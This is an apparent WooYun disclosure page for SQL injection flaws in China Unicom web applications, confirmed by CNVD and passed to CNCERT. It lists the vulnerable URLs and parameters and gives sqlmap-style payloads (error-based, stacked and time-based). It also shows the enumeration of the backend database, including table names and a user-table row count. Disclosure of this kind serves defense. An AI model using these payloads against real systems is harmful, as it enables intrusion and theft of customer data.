当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-052863

漏洞标题:联通重要应用存在多处SQL注入

相关厂商:中国联通

漏洞作者: HackBraid

提交时间:2014-03-05 15:24

修复时间:2014-04-19 15:25

公开时间:2014-04-19 15:25

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-03-05: 细节已通知厂商并且等待厂商处理中
2014-03-10: 厂商已经确认,细节仅向厂商公开
2014-03-20: 细节向核心白帽子及相关领域专家公开
2014-03-30: 细节向普通白帽子公开
2014-04-09: 细节向实习白帽子公开
2014-04-19: 细节向公众公开

简要描述:

SQL注入

详细说明:

1.联通万家:
2.天津10010补充一处sql:
http://www.10010tianjin.com:8080/wopai/confirmnumber?number=
注入点:
http://xt.10010jia.com/search.aspx?brand=1398
http://xt.10010jia.com/Search.aspx?LoSearch=&Locals=ls&type=&searchWord=
http://xt.10010jia.com/search.aspx?promotion=&type=&searchWord=&brand=&listType=&orderField=SalesNumber&LoSearch=
http://xt.10010jia.com/Search.aspx?searchWord=&brand=1092
http://xt.10010jia.com/search.aspx?chufang=1&cfid=&type=-99&searchWord=&brand=&listType=&orderField=SalesNumber&LoSearch=
http://xt.10010jia.com/Search.aspx?LoSearch=&Locals=ls&chufang=1&cfid=1&type=3778&searchWord=
http://xt.10010jia.com/ServiceStation/NewServicePro.aspx?sCustCode=1569401

漏洞证明:

1.当前DB:

Place: GET
Parameter: brand
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: brand=1398 AND 2980=CONVERT(INT,(SELECT CHAR(113)+CHAR(119)+CHAR(105)+CHAR(102)+CHAR(113)+(SELECT (CASE WHEN (2980=2980) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(102)+CHAR(104)+CHAR(113)))
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: brand=1398; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: brand=1398 WAITFOR DELAY '0:0:5'--
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: brand=(SELECT CHAR(113)+CHAR(119)+CHAR(105)+CHAR(102)+CHAR(113)+(SELECT (CASE WHEN (9004=9004) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(102)+CHAR(104)+CHAR(113))
---
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
current database: 'pifaxingtai'


设计账户,交易信息的tables,385个,只列部分:

Database: pifaxingtai
[385 tables]
+-------------------------------------------+
| ADManage |
| AgentArea |
| AgentAreaList |
| AllCustomers |
| Areas |
| B2B2COrdersRelation |
| B2C_AD_Auction |
| B2C_AD_Bdinfo |
| B2C_AD_Bid |
| B2C_AdvertismentSpace |
| B2C_Cartoon |
| B2C_FilterWords |
| B2C_FrishGoods_Distribute_Detail |
| B2C_FrishGoods_Distribute_head |
| B2C_GoodsPriceReport |
| B2C_Goods_NoneZP |
| B2C_InventoryChangesTrack |
| B2C_PointGoodsRecommend |
| B2C_Point_CLassGoods |
| B2C_PromotionType |
| B2C_PromotionTypeDetail |
| B2C_Promotions |
| B2C_PromotionsSpecifications |
| B2C_PromotionsSpecificationsDetail |
| B2C_PurchasingGoodsOrders |
| B2C_RedemptionGoods |
| B2C_SpecificationsDetail |
| B2C_StationPhones |
| B2C_TodayRecommend |
| B2C_tmpBLCX |
| B2c_AD |
| B2c_Activity |
| B2c_AddressKeyWords |
| B2c_Agency |
| B2c_AgencySetNumber |
| B2c_Agency_Brand |
| B2c_Agency_Class |
| B2c_Agency_User |
| B2c_Brand |
| B2c_BrandCategory |
| B2c_Brand_Class |
| B2c_Brand_Commission |
| B2c_CRecord |
| B2c_Database_OperationLog |
| B2c_Dict |
| B2c_Documents |
| B2c_FreshGoods_ServiceStation_Detail |
| B2c_FreshGoods_ServiceStation_head |
| B2c_FrishGoodsStock_Detail |
| B2c_FrishGoodsStock_List |
| B2c_FrishGoodsStock_head |
| B2c_FrishServiceStation_Goods |
| B2c_Goods |
| B2c_GoodsLost |
| B2c_GoodsLostPage |
| B2c_GoodsReturn |
| B2c_GoodsReturnPage |
| B2c_Goods_Certification |
| B2c_Goods_Class |
| B2c_Goods_ClassSet |
| B2c_Goods_Comment |
| B2c_Goods_Kitchen_Class |
| B2c_Goods_MainGoods |
| B2c_Goods_MainOrderClass |
| B2c_Goods_MiddleClass |
| B2c_Goods_MiddleGoods |
| B2c_Goods_OrderDetails |
| B2c_Goods_Orders |
| B2c_Goods_Pic |
| B2c_Goods_PorpertyList |
| B2c_Goods_Property |
| B2c_Goods_Refund |
| B2c_Goods_Related |
| B2c_Goods_Seek |
| B2c_Goods_noPassContent |
| B2c_Goods_withNoPassContent |
| B2c_KillGoods |
| B2c_LocalServices |
| B2c_Log_UserLogin |
| B2c_Log_UserVisit |
| B2c_Lottery |
| B2c_Lottery_bak1 |
| B2c_Manage_LoginLog |
| B2c_Manage_Menu |
| B2c_Manage_Role |
| B2c_Manage_User |
| B2c_Meeting_Application |
| B2c_Member |
| B2c_Member_BelongStation |
| B2c_Member_Browse |
| B2c_Member_Favourite |
| B2c_Member_Grade |
| B2c_Member_SendAddress |
| B2c_MenuFirst |
| B2c_MenuSecond |
| B2c_News |


xUser表1W+的数据:

Database: pifaxingtai
+-----------+---------+
| Table | Entries |
+-----------+---------+
| dbo.xUser | 11773 |
+-----------+---------+


还涉及不少交易信息,就不继续证明了

修复方案:

您懂!

版权声明:转载请注明来源 HackBraid@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2014-03-10 21:12

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT直接通报中国联通集团公司处置。

最新状态:

暂无